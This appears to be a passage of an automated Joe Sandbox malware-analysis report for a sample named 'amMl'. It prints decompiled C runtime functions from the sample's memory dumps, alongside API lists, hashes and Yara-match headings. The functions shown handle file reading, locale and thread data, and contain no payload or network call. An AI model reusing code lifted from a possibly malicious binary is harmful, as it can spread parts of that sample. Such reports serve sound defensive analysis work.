                                                                      • API String ID: 3886058894-0
                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction ID: 82a72810887145bd4ad274a3370a5061d62d10146332d04541f2a3a94254624f
                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction Fuzzy Hash: 7F51C571900209EFDB209F698C495EEBFB5FF81320F248629F82596191D7B1BE50DF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                      				signed int _v8;
                                                                      				char* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t90;
                                                                      				intOrPtr* _t92;
                                                                      				signed int _t94;
                                                                      				char _t97;
                                                                      				signed int _t105;
                                                                      				void* _t106;
                                                                      				signed int _t107;
                                                                      				signed int _t110;
                                                                      				signed int _t113;
                                                                      				intOrPtr* _t114;
                                                                      				signed int _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      				char* _t121;
                                                                      				signed int _t125;
                                                                      				signed int _t131;
                                                                      				signed int _t133;
                                                                      				void* _t134;
                                                                      
                                                                      				_t125 = __edx;
                                                                      				_t121 = _a4;
                                                                      				_t119 = _a8;
                                                                      				_t131 = 0;
                                                                      				_v12 = _t121;
                                                                      				_v8 = _t119;
                                                                      				if(_a12 == 0 || _a16 == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t138 = _t121;
                                                                      					if(_t121 != 0) {
                                                                      						_t133 = _a20;
                                                                      						__eflags = _t133;
                                                                      						if(_t133 == 0) {
                                                                      							L9:
                                                                      							__eflags = _t119 - 0xffffffff;
                                                                      							if(_t119 != 0xffffffff) {
                                                                      								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                      								_t134 = _t134 + 0xc;
                                                                      							}
                                                                      							__eflags = _t133 - _t131;
                                                                      							if(__eflags == 0) {
                                                                      								goto L3;
                                                                      							} else {
                                                                      								_t94 = _t90 | 0xffffffff;
                                                                      								_t125 = _t94 % _a12;
                                                                      								__eflags = _a16 - _t94 / _a12;
                                                                      								if(__eflags > 0) {
                                                                      									goto L3;
                                                                      								}
                                                                      								L13:
                                                                      								_t131 = _a12 * _a16;
                                                                      								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                      								_v20 = _t131;
                                                                      								_t120 = _t131;
                                                                      								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                      									_v16 = 0x1000;
                                                                      								} else {
                                                                      									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                      								}
                                                                      								__eflags = _t131;
                                                                      								if(_t131 == 0) {
                                                                      									L40:
                                                                      									return _a16;
                                                                      								} else {
                                                                      									do {
                                                                      										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                      										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                      											L24:
                                                                      											__eflags = _t120 - _v16;
                                                                      											if(_t120 < _v16) {
                                                                      												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                      												__eflags = _t97 - 0xffffffff;
                                                                      												if(_t97 == 0xffffffff) {
                                                                      													L48:
                                                                      													return (_t131 - _t120) / _a12;
                                                                      												}
                                                                      												__eflags = _v8;
                                                                      												if(_v8 == 0) {
                                                                      													L44:
                                                                      													__eflags = _a8 - 0xffffffff;
                                                                      													if(__eflags != 0) {
                                                                      														E0040BA30(_t131, _a4, 0, _a8);
                                                                      														_t134 = _t134 + 0xc;
                                                                      													}
                                                                      													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													L4:
                                                                      													E0040E744(_t125, _t131, _t133);
                                                                      													goto L5;
                                                                      												}
                                                                      												_t123 = _v12;
                                                                      												_v12 = _v12 + 1;
                                                                      												 *_v12 = _t97;
                                                                      												_t120 = _t120 - 1;
                                                                      												_t70 =  &_v8;
                                                                      												 *_t70 = _v8 - 1;
                                                                      												__eflags =  *_t70;
                                                                      												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                      												goto L39;
                                                                      											}
                                                                      											__eflags = _v16;
                                                                      											if(_v16 == 0) {
                                                                      												_t105 = 0x7fffffff;
                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                      												if(_t120 <= 0x7fffffff) {
                                                                      													_t105 = _t120;
                                                                      												}
                                                                      											} else {
                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                      												if(_t120 <= 0x7fffffff) {
                                                                      													_t55 = _t120 % _v16;
                                                                      													__eflags = _t55;
                                                                      													_t125 = _t55;
                                                                      													_t110 = _t120;
                                                                      												} else {
                                                                      													_t125 = 0x7fffffff % _v16;
                                                                      													_t110 = 0x7fffffff;
                                                                      												}
                                                                      												_t105 = _t110 - _t125;
                                                                      											}
                                                                      											__eflags = _t105 - _v8;
                                                                      											if(_t105 > _v8) {
                                                                      												goto L44;
                                                                      											} else {
                                                                      												_push(_t105);
                                                                      												_push(_v12);
                                                                      												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                      												_pop(_t123);
                                                                      												_push(_t106);
                                                                      												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                      												_t134 = _t134 + 0xc;
                                                                      												__eflags = _t107;
                                                                      												if(_t107 == 0) {
                                                                      													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                      													goto L48;
                                                                      												}
                                                                      												__eflags = _t107 - 0xffffffff;
                                                                      												if(_t107 == 0xffffffff) {
                                                                      													L47:
                                                                      													_t80 = _t133 + 0xc;
                                                                      													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                      													__eflags =  *_t80;
                                                                      													goto L48;
                                                                      												}
                                                                      												_v12 = _v12 + _t107;
                                                                      												_t120 = _t120 - _t107;
                                                                      												_v8 = _v8 - _t107;
                                                                      												goto L39;
                                                                      											}
                                                                      										}
                                                                      										_t113 =  *(_t133 + 4);
                                                                      										__eflags = _t113;
                                                                      										if(__eflags == 0) {
                                                                      											goto L24;
                                                                      										}
                                                                      										if(__eflags < 0) {
                                                                      											goto L47;
                                                                      										}
                                                                      										_t131 = _t120;
                                                                      										__eflags = _t120 - _t113;
                                                                      										if(_t120 >= _t113) {
                                                                      											_t131 = _t113;
                                                                      										}
                                                                      										__eflags = _t131 - _v8;
                                                                      										if(_t131 > _v8) {
                                                                      											_t133 = 0;
                                                                      											__eflags = _a8 - 0xffffffff;
                                                                      											if(__eflags != 0) {
                                                                      												E0040BA30(_t131, _a4, 0, _a8);
                                                                      												_t134 = _t134 + 0xc;
                                                                      											}
                                                                      											_t114 = E0040BFC1(__eflags);
                                                                      											_push(_t133);
                                                                      											_push(_t133);
                                                                      											_push(_t133);
                                                                      											_push(_t133);
                                                                      											 *_t114 = 0x22;
                                                                      											_push(_t133);
                                                                      											goto L4;
                                                                      										} else {
                                                                      											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                      											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                      											 *_t133 =  *_t133 + _t131;
                                                                      											_v12 = _v12 + _t131;
                                                                      											_t120 = _t120 - _t131;
                                                                      											_t134 = _t134 + 0x10;
                                                                      											_v8 = _v8 - _t131;
                                                                      											_t131 = _v20;
                                                                      										}
                                                                      										L39:
                                                                      										__eflags = _t120;
                                                                      									} while (_t120 != 0);
                                                                      									goto L40;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t118 = _t90 | 0xffffffff;
                                                                      						_t90 = _t118 / _a12;
                                                                      						_t125 = _t118 % _a12;
                                                                      						__eflags = _a16 - _t90;
                                                                      						if(_a16 <= _t90) {
                                                                      							goto L13;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					L3:
                                                                      					_t92 = E0040BFC1(_t138);
                                                                      					_push(_t131);
                                                                      					_push(_t131);
                                                                      					_push(_t131);
                                                                      					_push(_t131);
                                                                      					 *_t92 = 0x16;
                                                                      					_push(_t131);
                                                                      					goto L4;
                                                                      				}
                                                                      			}






























                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 3886058894-0
                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno$__getptd_noexit__lock_file
                                                                      • String ID: 'B
                                                                      • API String ID: 3755561058-2787509829
                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction ID: 1087d250c6105b9df1235495b0dbeb6ea13c8801cb9ccdc8ec5811bba747c2e7
                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction Fuzzy Hash: 0F01663310461956D2216B786C4B4FDBFA0BEC6B3033A8715F0709B1D2EB28FD429299
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 005C49AB
                                                                        • Part of subcall function 005C099C: __getptd_noexit.LIBCMT ref: 005C099F
                                                                        • Part of subcall function 005C099C: __amsg_exit.LIBCMT ref: 005C09AC
                                                                      • __getptd.LIBCMT ref: 005C49C2
                                                                      • __amsg_exit.LIBCMT ref: 005C49D0
                                                                      • __lock.LIBCMT ref: 005C49E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                      • String ID: @.B
                                                                      • API String ID: 3521780317-470711618
                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction ID: cbee799ba8ab69660176c9eed35308b3db0e4f18da0be88717c5aa29e8422c55
                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction Fuzzy Hash: 33F09031A407219FDB20FBE4890BFEA7BA07F80760F55051EE444A72D2DB74A801DF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                      				signed int _t13;
                                                                      				intOrPtr _t28;
                                                                      				void* _t29;
                                                                      				void* _t30;
                                                                      
                                                                      				_t30 = __eflags;
                                                                      				_t26 = __edi;
                                                                      				_t25 = __edx;
                                                                      				_t22 = __ebx;
                                                                      				_push(0xc);
                                                                      				_push(0x4214d0);
                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                      				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                      				_t13 =  *0x422e34; // 0xfffffffe
                                                                      				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                      					L6:
                                                                      					E0040D6E0(_t22, 0xc);
                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                      					_t26 =  *0x422f18; // 0x422e40
                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                      					E004147A2();
                                                                      				} else {
                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                      					}
                                                                      				}
                                                                      				if(_t28 == 0) {
                                                                      					E0040E79A(_t25, _t26, 0x20);
                                                                      				}
                                                                      				return E0040E21D(_t28);
                                                                      			}








                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00414744
                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                      • __lock.LIBCMT ref: 00414779
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                      • String ID: @.B
                                                                      • API String ID: 3521780317-470711618
                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___addlocaleref.LIBCMT ref: 005C4973
                                                                      • ___removelocaleref.LIBCMT ref: 005C497E
                                                                      • ___freetlocinfo.LIBCMT ref: 005C4992
                                                                        • Part of subcall function 005C46F0: ___free_lconv_mon.LIBCMT ref: 005C4736
                                                                        • Part of subcall function 005C46F0: ___free_lconv_num.LIBCMT ref: 005C4757
                                                                        • Part of subcall function 005C46F0: ___free_lc_time.LIBCMT ref: 005C47DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                      • String ID: @.B$@.B
                                                                      • API String ID: 4212647719-183327057
                                                                      • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                      • Instruction ID: ac3ef583a27a8e3f97789a358e2a519a1391b0cee9fff06e45c65e2ee4aecf55
                                                                      • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                      • Instruction Fuzzy Hash: BFE0DF32511A320D8A312A9C6820F6F9E943FE2312B1B212EF84CE7045DB344C808CE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                      				intOrPtr _v8;
                                                                      				void* _t16;
                                                                      				void* _t17;
                                                                      				intOrPtr _t19;
                                                                      				void* _t21;
                                                                      				signed int _t22;
                                                                      				intOrPtr* _t27;
                                                                      				intOrPtr _t39;
                                                                      				intOrPtr _t40;
                                                                      				intOrPtr _t50;
                                                                      
                                                                      				_t37 = __edx;
                                                                      				_push(8);
                                                                      				_push(0x421140);
                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                      				_t39 = _a4;
                                                                      				_t50 = _t39;
                                                                      				_t51 = _t50 != 0;
                                                                      				if(_t50 != 0) {
                                                                      					E0040FB29(_t39);
                                                                      					_v8 = 0;
                                                                      					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                      					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                      					__eflags = _t16 - 0xffffffff;
                                                                      					if(_t16 == 0xffffffff) {
                                                                      						L6:
                                                                      						_t17 = 0x4227e0;
                                                                      					} else {
                                                                      						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                      						__eflags = _t21 - 0xfffffffe;
                                                                      						if(_t21 == 0xfffffffe) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                      							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                      						}
                                                                      					}
                                                                      					_t9 = _t17 + 4; // 0xa80
                                                                      					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                      					_v8 = 0xfffffffe;
                                                                      					E0040C735(_t39);
                                                                      					_t19 = 0;
                                                                      					__eflags = 0;
                                                                      				} else {
                                                                      					_t27 = E0040BFC1(_t51);
                                                                      					_t40 = 0x16;
                                                                      					 *_t27 = _t40;
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E0040E744(__edx, _t40, 0);
                                                                      					_t19 = _t40;
                                                                      				}
                                                                      				return E0040E21D(_t19);
                                                                      			}














                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2805327698-0
                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 005C423F
                                                                        • Part of subcall function 005C099C: __getptd_noexit.LIBCMT ref: 005C099F
                                                                        • Part of subcall function 005C099C: __amsg_exit.LIBCMT ref: 005C09AC
                                                                      • __amsg_exit.LIBCMT ref: 005C425F
                                                                      • __lock.LIBCMT ref: 005C426F
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 005C428C
                                                                      • InterlockedIncrement.KERNEL32(00422D38), ref: 005C42B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                      • String ID:
                                                                      • API String ID: 4271482742-0
                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction ID: 6878c2d7d5a13e19f8403f20707a828ce1c2a5ead18950f3b4b7e2ad2a06008b
                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction Fuzzy Hash: 4F01C435A01622EFDB21ABA4980BFEEBF60BF84720F540019F814A7291C7746981DFD9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int _t15;
                                                                      				LONG* _t21;
                                                                      				long _t23;
                                                                      				void* _t31;
                                                                      				LONG* _t33;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      
                                                                      				_t35 = __eflags;
                                                                      				_t29 = __edx;
                                                                      				_t25 = __ebx;
                                                                      				_push(0xc);
                                                                      				_push(0x421490);
                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                      				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                      				_t15 =  *0x422e34; // 0xfffffffe
                                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                      					E0040D6E0(_t25, 0xd);
                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                      					__eflags = _t33 -  *0x422d38; // 0x2241638
                                                                      					if(__eflags != 0) {
                                                                      						__eflags = _t33;
                                                                      						if(_t33 != 0) {
                                                                      							_t23 = InterlockedDecrement(_t33);
                                                                      							__eflags = _t23;
                                                                      							if(_t23 == 0) {
                                                                      								__eflags = _t33 - 0x422910;
                                                                      								if(__eflags != 0) {
                                                                      									_push(_t33);
                                                                      									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t21 =  *0x422d38; // 0x2241638
                                                                      						 *(_t31 + 0x68) = _t21;
                                                                      						_t33 =  *0x422d38; // 0x2241638
                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                      						InterlockedIncrement(_t33);
                                                                      					}
                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                      					E00414067();
                                                                      				} else {
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      				}
                                                                      				if(_t33 == 0) {
                                                                      					E0040E79A(_t29, _t31, 0x20);
                                                                      				}
                                                                      				return E0040E21D(_t33);
                                                                      			}











                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                      • __lock.LIBCMT ref: 00414008
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                      • InterlockedIncrement.KERNEL32(02241638), ref: 00414050
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                      • String ID:
                                                                      • API String ID: 4271482742-0
                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $2$l
                                                                      • API String ID: 0-3132104027
                                                                      • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                      • Instruction ID: 7716afe95ae3bcdc016b848fe434a22ff3bc75f0c09f063f0a0137157d8b71f4
                                                                      • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                      • Instruction Fuzzy Hash: B241F338804A698EDF349AA5889CBF87FB1BB03355F1401CEC09966193C7794EC6CF48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __calloc_crt
                                                                      • String ID: P$B$`$B
                                                                      • API String ID: 3494438863-235554963
                                                                      • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                      • Instruction ID: fcd3326c3878762db55c03a528e5a54cec4855616686b5ebc1193c33e3255c43
                                                                      • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                      • Instruction Fuzzy Hash: 491106313086165FE7248F2CBC55BA52B91FBC5324BB4463AE611CB2A4E770EC824758
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E00413610() {
                                                                      				signed long long _v12;
                                                                      				signed int _v20;
                                                                      				signed long long _v28;
                                                                      				signed char _t8;
                                                                      
                                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                                      				if(_t8 == 0) {
                                                                      					L6:
                                                                      					_v20 =  *0x41fb50;
                                                                      					_v28 =  *0x41fb48;
                                                                      					asm("fsubr qword [ebp-0x18]");
                                                                      					_v12 = _v28 / _v20 * _v20;
                                                                      					asm("fld1");
                                                                      					asm("fcomp qword [ebp-0x8]");
                                                                      					asm("fnstsw ax");
                                                                      					if((_t8 & 0x00000005) != 0) {
                                                                      						return 0;
                                                                      					} else {
                                                                      						return 1;
                                                                      					}
                                                                      				} else {
                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                      					if(__eax == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						_push(0);
                                                                      						return __eax;
                                                                      					}
                                                                      				}
                                                                      			}








                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
